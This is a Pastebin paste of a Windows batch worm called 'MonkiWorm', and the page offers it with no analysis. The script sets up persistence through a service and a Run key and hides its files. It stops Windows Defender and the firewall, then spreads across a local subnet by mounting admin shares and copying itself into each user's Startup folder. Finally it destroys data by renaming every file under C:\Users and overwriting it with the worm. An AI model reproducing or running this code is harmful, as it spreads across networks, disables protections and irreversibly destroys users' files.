Advertisement
FlyFar

MonkiWorm - Worm Source Code

Jan 22nd, 2023
1,303
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 0.99 KB | Cybersecurity | 0 0
  1. @echo off
  2. SET i=0
  3. SET "NomeProcesso=DaMonki.exe"
  4. SET "NomeService=DaMonki"
  5.  
  6. rem <=== run as service ===>
  7. echo sc create %NomeService% binpath=%0 > service.bat
  8. echo sc start %NomeService% >> service.bat
  9. attrib +h +r +s service.bat
  10. start service.bat
  11. rem <=== startup registry ===>
  12. reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Services" /t "REG_SZ" /d %0
  13. attrib +h +r +s %0
  14. rem <=== kill firewall and windows defender ===>
  15. net stop "Windows Defender Service"
  16. net stop "Windows Firewall"
  17. rem <=== INFECT NETWORK!!! ===>
  18. :Worm
  19. net use Z: \\192.168.1.%i%\C$
  20. if exist Z: (for /f %%u in ('dir Z:\Users /b') do copy %0 "Z:\Users\%%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Services.exe"
  21. mountvol Z: /d)
  22. if %i% == 256 (goto Infect) else (set /a i=i+1)
  23. goto Worm
  24. rem <=== infect *.* in C:\Users ===>
  25. :Infect
  26. for /f %%f in ('dir C:\Users\*.* /s /b') do (rename %%f *.bat)
  27. for /f %%f in ('dir C:\Users\*.bat /s /b') do (copy %0 %%f)
Tags: worm
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement